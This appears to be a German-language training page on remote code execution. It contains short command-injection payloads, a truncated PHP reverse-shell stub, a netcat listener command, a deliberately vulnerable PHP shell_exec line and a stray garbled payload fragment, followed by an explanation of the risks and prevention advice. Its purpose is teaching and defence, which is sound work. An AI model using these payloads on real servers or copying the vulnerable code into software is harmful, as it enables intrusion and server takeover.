Critical Vulnerability Module

Remote Code Execution

Erlange die volle Kontrolle. RCE erlaubt es Angreifern, beliebige Systembefehle direkt auf dem Webserver auszuführen.

RCE Payloads

01. Basic Command Injection

Hängt einen Befehl an eine existierende Abfrage an.

; id

02. Sensitive File Read

Listet Systemdateien und Berechtigungen auf.

; ls -la
&3 2>&3\");\'')">

03. PHP Reverse Shell

Verbindet den Server zurück zum Angreifer-Terminal.

; php -r 'fsockopen...'

04. Python Execution

Nutzt installierte Interpreter für Befehle.

; python3 -c ...

Network Diagnostic Tool

Geben Sie eine IP-Adresse ein, um die Verbindung zu prüfen.

// Backend PHP Code:
shell_exec("ping -c 1 " . $_POST['ip']);
SYSTEM_COMMAND_OUTPUT ● STDOUT
Enter IP and press 'Run Ping'...

Automatisierter Shell-Zugriff

Attacker (Listening...)

$ nc -lvnp 4444
listening on [any] 4444 ...

Der Angreifer wartet darauf, dass der Server die Verbindung zu ihm aufbaut.

Exploit Result

// No connection yet...

RCE Security Deep Dive

Warum ist RCE so gefährlich?

RCE ist die maximale Eskalationsstufe. Ein Angreifer agiert im Kontext des Webservers und kann Programme installieren, Daten löschen oder den Server als Sprungbrett (Pivoting) in das interne Netzwerk nutzen.

Wie entstehen Command Injections?

Sie entstehen, wenn Systembefehle (wie ping, curl oder mail) durch Benutzereingaben zusammengesetzt werden, ohne Sonderzeichen wie ;, & oder | zu filtern.

Was ist eine Reverse Shell?

Im Gegensatz zu einer normalen Shell verbindet sich hier das Opfer mit dem Angreifer. Das umgeht oft Firewalls, da ausgehende Verbindungen häufig weniger streng überwacht werden als eingehende.

Prävention: Wie schütze ich mich?

Vermeiden Sie Funktionen wie exec(), system() oder shell_exec(). Nutzen Sie stattdessen eingebaute APIs (z.B. filter_var()) oder Whitelisting von erlaubten Zeichen.